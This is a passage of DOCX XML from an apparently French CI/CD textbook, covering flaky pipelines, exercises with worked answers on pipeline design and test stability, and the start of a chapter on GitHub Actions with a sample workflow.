              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des déclencheurs maîtrisés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GitHub Actions</w:t>
        <w:br/>
        <w:t>on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pull_request:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  push:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    branches: [main]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    tags: ["v*"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  schedule:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - cron: "0 3 * * 1"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne pas lancer deux pipelines identiques</w:t>
        <w:br/>
        <w:t>concurrency:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group: ${{ github.workflow }}-${{ github.ref }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cancel-in-progress: true</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ANNULER LES EXÉCUTIONS OBSOLÈTES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sur une branche active, plusieurs pipelines se chevauchent. Sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>concurrency</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, les ressources sont gaspillées et les résultats peuvent sembler contradictoires.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>78.5 Pipelines instables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test qui échoue une fois sur dix détruit la confiance dans le pipeline. L'équipe finit par relancer sans lire, ce qui annule tout le bénéfice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.297 — Cinq symptômes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4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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échec intermittent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test dépendant du temps ou de l'ordre</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Isoler, horloge fixe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Lenteur croissante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Cache inopérant</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Clé de cache stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étape ignorée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Condition trop large</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Restreindre le déclencheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Échec aléatoire réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Dépendance externe</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Simuler ou réessayer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Absence de résultat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quota de workers</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Vérifier la file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux mesures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Mesurer la durée par étape</w:t>
        <w:br/>
        <w:t># Dans GitHub Actions, chaque étape a une durée visible dans l'interface.</w:t>
        <w:br/>
        <w:t># Objectif : 80 % des pipelines sous 10 minutes.</w:t>
        <w:br/>
        <w:br/>
        <w:t># Identifier les étapes les plus lentes</w:t>
        <w:br/>
        <w:t>gh run list --limit 20 --json name,conclusion,createdAt,updatedAt</w:t>
        <w:br/>
        <w:br/>
        <w:t># Un test instable se répare ou se supprime, il ne se réessaie pas</w:t>
        <w:br/>
        <w:t xml:space="preserve">  indéfiniment</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CONCEVOIR UN PIPELINE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Lister les risques à couvrir, puis les étapes correspondantes.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Placer les contrôles rapides en premier.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Construire une seule fois et promouvoir l'artefact.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Rendre les échecs exploitables : message clair, journal accessible.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Mesurer la durée et viser moins de dix minutes.</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Intégration, livraison et déploiement continus sont trois engagements distincts.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Chaque étape doit réduire un risque identifiable.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contrôles rapides passent en premier.</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On construit une fois et on promeut l'artefact.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L'empreinte d'image garantit l'identité de l'artefact.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cache et la parallélisation réduisent la durée.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pipeline instable détruit la confiance.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test intermittent se répare, il ne se relance pas indéfiniment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les principes sont posés. Le chapitre suivant les met en œuvre dans GitHub Actions et GitLab CI.</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78.1 — Concevoir un pipeline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Une application Node doit être testée, construite et publiée.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Ordonnez les étapes.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Estimez les durées.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Précisez les déclencheurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 78.2 — Réduire la durée d'un pipeline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Le pipeline dure 24 minutes.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Mesurez chaque étape.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Ajoutez un cache.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Parallélisez les tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 78.3 — Diagnostiquer un test intermittent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   QUALITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test échoue une fois sur dix, sans modification de code.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Reproduisez localement.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Cherchez une dépendance au temps.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Corrigez la cause.</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78.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>stages: [lint, test, build, security, publish]</w:t>
        <w:br/>
        <w:br/>
        <w:t>lint:        # 30 s, chaque commit</w:t>
        <w:br/>
        <w:t>test:        # 3 min, chaque demande de fusion</w:t>
        <w:br/>
        <w:t>build:       # 2 min, après test</w:t>
        <w:br/>
        <w:t>security:    # 1 min, après build</w:t>
        <w:br/>
        <w:t>publish:     # 1 min, seulement sur étiquette v*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La publication n'a lieu que sur une étiquette : aucune image intermédiaire n'est publiée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les étapes rapides en premier donnent un retour en moins d'une minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 78.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Avant : 24 min</w:t>
        <w:br/>
        <w:t># install 6 min (sans cache)</w:t>
        <w:br/>
        <w:t># test    12 min (séquentiel)</w:t>
        <w:br/>
        <w:t># build   4 min</w:t>
        <w:br/>
        <w:t># deploy  2 min</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après : 9 min</w:t>
        <w:br/>
        <w:t># install 1 min (cache node_modules)</w:t>
        <w:br/>
        <w:t># test    4 min (4 workers)</w:t>
        <w:br/>
        <w:t># build   3 min</w:t>
        <w:br/>
        <w:t># deploy  1 min</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cache des dépendances est le gain le plus simple et le plus sûr.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La parallélisation des tests dépend de leur indépendance : vérifiez qu'ils ne partagent pas d'état.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 78.3</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Fragile : dépend de l'heure réelle</w:t>
        <w:br/>
        <w:t>expect(formaterDate(new Date())).toBe("aujourd'hui");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Robuste : horloge injectée</w:t>
        <w:br/>
        <w:t>const horloge = () =&gt; new Date("2026-10-19T12:00:00Z");</w:t>
        <w:br/>
        <w:t>expect(formaterRelatif(dateMoinsUnJour, horloge)).toBe("hier");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Autre cause fréquente : ordre d'exécution et état partagé</w:t>
        <w:br/>
        <w:t>beforeEach(() =&gt; { base = creerBaseEnMemoire(); });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test qui dépend de l'horloge échoue autour de minuit ou lors des changements d'heure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'état partagé entre tests produit des échecs dépendant de l'ordre d'exécution : réinitialisez avant chaque test.</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 garantit le déploiement continu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Tout est testé</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Chaque changement validé part en production automatiquement</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Aucun test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Une revue manuelle</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Pourquoi placer les contrôles rapides en premier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Pour la lisibilité</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Pour obtenir un retour plus tôt</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Pour économiser du cache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Ce n'est pas utile</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 garantit une promotion par empreinte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 déploiement plus rapide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L'identité exacte de l'artefact testé</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Un cache plus efficace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Une image plus petite</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 faire d'un test intermittent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Le relancer</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 supprimer</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 réparer ou l'isoler</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Augmenter le délai</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>concurrency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cancel-in-progress</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Bloque les commits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Annule les exécutions obsolètes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Réduit la mémoire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Signe les artefacts</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La décision humaine est supprimée, les contrôles automatisés la remplacent.</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Un échec rapide évite d'attendre des étapes longues inutiles.</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L'empreinte identifie le contenu, contrairement à une étiquette mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un test instable détruit la confiance dans tout le pipeline.</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Seule la dernière exécution d'une branche est conservée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>79. GitHub Actions et GitLab CI en pratique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Écrire des pipelines lisibles, réutilisables et sûrs dans les deux forges les plus répandues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 30 · Niveau : Intermédiaire · Prérequis : chapitre 78</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Structurer un workflow GitHub Actions.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Écrire un pipeline GitLab CI avec ses étapes.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Partager des modèles entre projets.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Protéger les secrets et les déclencheurs.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Transposer un pipeline d'une forge à l'autre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>79.1 Anatomie d'un workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GitHub Actions décrit un workflow dans un fichier YAML, composé de tâches (jobs) exécutées sur des machines (runners). Chaque tâche enchaîne des étapes (steps), qui appellent des actions réutilisables ou des commandes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un workflow complet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name: CI</w:t>
        <w:br/>
        <w:br/>
        <w:t>on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pull_request:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  push:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    branches: [main]</w:t>
        <w:br/>
        <w:br/>
        <w:t>permissions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  contents: read</w:t>
        <w:br/>
        <w:br/>
        <w:t>jobs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  build:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    runs-on: ubuntu-24.04</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout-minutes: 15</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    steps:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          node-version: 22</w:t>
        <w:br/>
        <w:t xml:space="preserve">          cache: npm</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm ci</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm run lint</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm test -- --reporter=verbose</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - run: npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">      - uses: actions/upload-artifact@v4</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if: always()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          name: rapport</w:t>
        <w:br/>
        <w:t xml:space="preserve">          path: rapports/</w:t>
        <w:br/>
        <w:t xml:space="preserve">          retention-days: 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.298 — Sept éléments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49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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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319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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déclencheurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
